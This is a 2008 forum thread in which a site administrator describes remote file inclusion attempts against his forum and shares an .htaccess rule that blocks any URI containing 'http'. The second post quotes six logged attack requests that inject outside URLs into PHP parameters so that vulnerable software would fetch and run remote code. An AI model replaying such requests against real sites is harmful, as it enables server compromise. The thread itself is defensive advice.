An Tir Chirurgeon's Guild Message Board Forum Index An Tir Chirurgeon's Guild Message Board
The online community of the An Tir Chirurgeonate.
 
  FAQFAQ       RegisterRegister  
  Log in to check your private messagesLog in to check your private messages     Log inLog in  

Numerous Hack attempts from eclub.lv

 
Post new topic   Reply to topic    An Tir Chirurgeon's Guild Message Board Forum Index -> Site Announcements
View previous topic :: View next topic  
Author Message
Conal
Master Chirurgeon
Master Chirurgeon


Joined: 15 Dec 2004
Posts: 138
SCA Branch: Shire of Drygestan, Kingdom of the Outlands

PostPosted: Tue Mar 25, 2008 7:24    Post subject: Numerous Hack attempts from eclub.lv Reply with quote

Well, taking a look at the server logs over the past few days, we've been inundated with hack attempts coming from a server in Latvia that is sending request for certain files on our server, and appending it with a website address, usually something like "maryswedding.eclub.lv/images?" or "partygirl.eclub.lv/images/pictureofme?" Don't try following these links - trust me, you don't want to! Most likely you'll just get a dump of their code, but if by some chance your machine has a vunerability, you'll get hacked.

My guess is that they are trying to exploit a security hole on certain types of forum, blog, or shopping cart software that would cause the software to execute the code that is waiting at the end of the url they're pointing to.

Our code is immune to the hack, but it's causing dozens of entries per hour to show up in my server logs while they hammer away at the gates.

Sadly, the attacks are not coming from any specific ip block. It looks like they are part of a zombie attack, as they come from IP addresses all over the world, so I can't just block an IP range and be done with it.

In order to solve the problem, and keep them from even getting to the gates, I've modified our htaccess file by inserting the following lines:

Code:
# 25 March 2008 - Block http://(.*)eclub.lv/images? hack attempts        #
<FilesMatch "^(.*)http(.*)$">
   Order allow,deny
   Deny from all
   Satisfy All
</FilesMatch>

This works by matching any URI that contains http in it. When that happens, the code within the <FilesMatch> block executes, issuing a "Deny from all", and ending the issue once and for all with a "403 - Access Denied" responce.

I could have set it to match eclub.lv, but I get the idea that these morons will eventually get kicked off of eclub.lv, and have to go elsewhere. Since they must have the "http://" in the URI they're trying to load in order to make their nasty little trick work, blocking any URI with http in it will work for any varient they come up with. Mind you, some systems might legitimately be passing a url using a $get command, like this:

Code:
http://www.mydomain.com/newsite.php?site=http://www.anothersite.com"

In which case this <FilesMatch> would wack that process, as the URI would come out to "/newsite.php?site=http://www.anothersite.com", and you'd get a 403. If that's the case, you'll need a regex to match something else specific to the URI - like <FilesMatch "^(.*)eclub\.lv(.*)$">.

Fortuantely, on our system this will never happen, so I'm using the shotgun method, and blocking any attempt to load a file with http as part of the URI.

Now, this information is pretty dull for anyone who doesn't play in the web arena, but I'm putting this info up here on our public area so that other webmasters that might come across this problem can fix the headache without having to repeat the research.
_________________
THLord Conal MacNachtan

"The age of chivalry is never past, so long as there is a wrong left unredressed on earth, or a man or woman left to say, I will redress that wrong, or spend my life in the attempt."
Charles S. Kingsley, Life (vol. II, ch. XXVIII)

http://www.cafepress.com/conalscorner - Because it's not just something we do on the weekend.
Back to top
View user's profile Send private message Send e-mail Visit poster's website
Conal
Master Chirurgeon
Master Chirurgeon


Joined: 15 Dec 2004
Posts: 138
SCA Branch: Shire of Drygestan, Kingdom of the Outlands

PostPosted: Fri Mar 28, 2008 6:27    Post subject: Horatius at the gate. Reply with quote

Well, I'm glad that I chose to use brute force blocking of all uri requests containing "http" instead of just looking for "eclub.lv". We've caught about a hundred odd attempts on the same theme trying to get in since I put the block up:

Code:
GET /chi-news.phphttp://myweddingphotos.by.ru/images? HTTP/1.1
GET /aboutus.php/middle.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1
GET /vol-prot.php/protection.php?action=logout&siteurl=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1
GET //articles.php?PageURL=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1
GET /aboutus.php/aboutus.php?page=http://clanx.clanservers.com/modules/vwar/convert/can?? HTTP/1.1
GET /index.php/index.php?aid=http://12.30.229.109/images/.../di?? HTTP/1.1

They all received a nice big "403 - Access Denied.", curtesty of the .htaccess file - our Horatius at the gate, keeping the Etruscans at bay.
_________________
THLord Conal MacNachtan

"The age of chivalry is never past, so long as there is a wrong left unredressed on earth, or a man or woman left to say, I will redress that wrong, or spend my life in the attempt."
Charles S. Kingsley, Life (vol. II, ch. XXVIII)

http://www.cafepress.com/conalscorner - Because it's not just something we do on the weekend.
Back to top
View user's profile Send private message Send e-mail Visit poster's website
Display posts from previous:   
Post new topic   Reply to topic    An Tir Chirurgeon's Guild Message Board Forum Index -> Site Announcements All times are GMT - 8 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group
Content and Layout © 2004-2006 William J. Knight, All Rights Reserved.